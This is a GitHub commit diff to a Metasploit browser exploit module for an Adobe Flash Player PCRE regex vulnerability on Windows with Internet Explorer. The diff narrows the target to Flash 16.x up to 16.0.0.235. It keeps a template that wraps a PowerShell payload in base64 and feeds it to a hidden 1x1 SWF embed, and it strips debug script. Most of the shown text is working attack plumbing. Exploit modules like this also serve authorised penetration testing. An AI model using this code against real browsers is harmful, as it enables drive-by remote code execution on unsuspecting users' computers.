Skip to content

Commit 2b19931

Browse files
committed
Final
1 parent 2a25e2b commit 2b19931

File tree

1 file changed

+12
-17
lines changed

1 file changed

+12
-17
lines changed

modules/exploits/windows/browser/adobe_flash_pcre.rb

Lines changed: 12 additions & 17 deletions
Original file line numberDiff line numberDiff line change
@@ -17,12 +17,15 @@ def initialize(info={})
1717
super(update_info(info,
1818
'Name' => "Adobe Flash Player PCRE Regex Vulnerability",
1919
'Description' => %q{
20-
Flash
20+
This module exploits a vulnerability found in Adobe Flash Player. A compilation logic error
21+
in the PCRE engine, specifically in the handling of the \c escape sequence when followed by
22+
a multi-byte UTF8 character, allows arbitrary execution of PCRE bytecode.
2123
},
2224
'License' => MSF_LICENSE,
2325
'Author' =>
2426
[
25-
'Mark Brand' # Found vuln
27+
'Mark Brand', # Found vuln
28+
'sinn3r' # MSF
2629
],
2730
'References' =>
2831
[
@@ -37,8 +40,7 @@ def initialize(info={})
3740
},
3841
'DefaultOptions' =>
3942
{
40-
# 'InitialAutoRunScript' => 'migrate -f',
41-
'Retries' => false
43+
'Retries' => true
4244
},
4345
'Platform' => 'win',
4446
'BrowserRequirements' =>
@@ -48,7 +50,9 @@ def initialize(info={})
4850
:method => "LoadMovie",
4951
:os_name => OperatingSystems::Match::WINDOWS,
5052
:ua_name => Msf::HttpClients::IE,
51-
#:flash => lambda { |ver| ver =~ /^11\.5/ && ver < '11.5.502.149' }
53+
# Ohter versions are vulnerable but .235 is the one that works for me pretty well
54+
# So we're gonna limit to this one for now. More validation needed in the future.
55+
:flash => lambda { |ver| ver =~ /^16\./ && ver <= '16.0.0.235' }
5256
},
5357
'Targets' =>
5458
[
@@ -60,6 +64,8 @@ def initialize(info={})
6064
end
6165

6266
def exploit
67+
# Please see data/exploits/CVE-2015-0318/ for source,
68+
# that's where the actual exploit is
6369
@swf = create_swf
6470
super
6571
end
@@ -81,7 +87,6 @@ def on_request_exploit(cli, request, target_info)
8187
end
8288

8389
def exploit_template(cli, target_info)
84-
8590
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
8691
target_payload = get_payload(cli, target_info)
8792
psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
@@ -96,18 +101,8 @@ def exploit_template(cli, target_info)
96101
<param name="Play" value="true" />
97102
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/>
98103
</object>
99-
100-
<script>
101-
function debug_alert(msg) {
102-
console.log(msg);
103-
}
104-
105-
function debug_print(msg) {
106-
console.log(msg);
107-
}
108-
</script>
109104
</body>
110-
</html>
105+
</html>
111106
|
112107

113108
return html_template, binding()

0 commit comments

Comments
 (0)